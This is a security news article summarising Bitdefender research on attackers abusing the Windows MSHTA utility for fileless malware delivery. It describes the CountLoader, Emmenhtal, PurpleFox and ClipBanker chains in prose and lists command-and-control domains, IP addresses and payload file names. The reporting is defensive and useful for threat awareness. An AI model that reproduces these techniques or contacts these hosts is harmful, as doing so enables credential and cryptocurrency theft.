An old Windows tool called MSHTA is being exploited by hackers to infect systems with malware, reveals the latest research from Bitdefender. Reportedly, this tool, which was created to work with Internet Explorer (IE), still remains active by default on Windows computers despite IE’s retirement in 2022, mainly to help run older software smoothly.
Attack Patterns
Bitdefender’s research, shared with Hackread.com, highlights that threat actors are actively abusing it as a Living-off-the-Land binary (LOLBIN), enabling them to carry out fileless attacks. They can execute malicious VBScript and JavaScript code directly in the computer’s memory and ensure that it appears as legitimate administrative tasks.
These fileless attack chains rely on common social engineering tricks like ClickFix scams and fake software downloads. Such as, in one campaign, fake Google ads for Claude Code were used to lure victims, and in another, attackers bundled malware into pirated downloads of the movie One Battle After Another.
Typically, attackers force MSHTA to run a hidden command shell, checking specific IP addresses to execute malicious packages via Microsoft Installer.
The Types of Threats Discovered
Further investigation revealed that MSHTA helps deliver several different types of malware; some are designed to steal passwords, browser data, and cryptocurrency wallet information from unsuspecting users, while others are more advanced threats that can stay hidden on a computer for a long time to spy on users.
For example, a program called CountLoader was seen using this method to drop information-stealing software like LummaStealer and Amatera onto devices. This involved using a zip archive with a legitimate Python interpreter renamed as Setup.exe to load a malicious script (.\Lib\encodings\aliases.py), which launches a renamed MSHTA file (iso2022.exe) to connect to C2 domains like google-services.cc, explorer.vg, and ccleaner.gl.
Similarly, Emmenhtal Loader uses phishing links on Discord to send victims to fake reCAPTCHA verification sites like humancheck.shop and eventually runs the LummaStealer payload.
Another threat called PurpleFox uses this utility to quietly download a malicious MSI package disguised as a .png file (3EBCE3A4.png) for data theft.
MSHTA is also abused by ClipBanker to hijack cryptocurrency wallet addresses via a remote file (checking.hta) that downloads persistence scripts named checking.ps1 and ichigo-lite.ps1.These scripts are fetched from the IP addresses 185.208.159.199 and 87.96.21.84, using scheduled tasks to be seen as legitimate services.
However, researchers pointed out that not all instances of this activity are malicious because most detections actually stem from legitimate software updating its systems.
“Not every MSHTA execution we observed was clearly malicious. A significant portion of detections came from DriverPack’s update mechanism… that downloads driver files from third-party sources rather than through official Microsoft update channels. This is an important reminder that MSHTA usage is not automatically malicious,” the blog post reads.
Microsoft plans to fully retire VBScript by 2027, but there’s no public timeline given for its removal. Bitdefender, therefore, recommends that until it happens, organisations should restrict or block mshta.exe and wscript.exe in environments where they are not operationally required to stay safe.
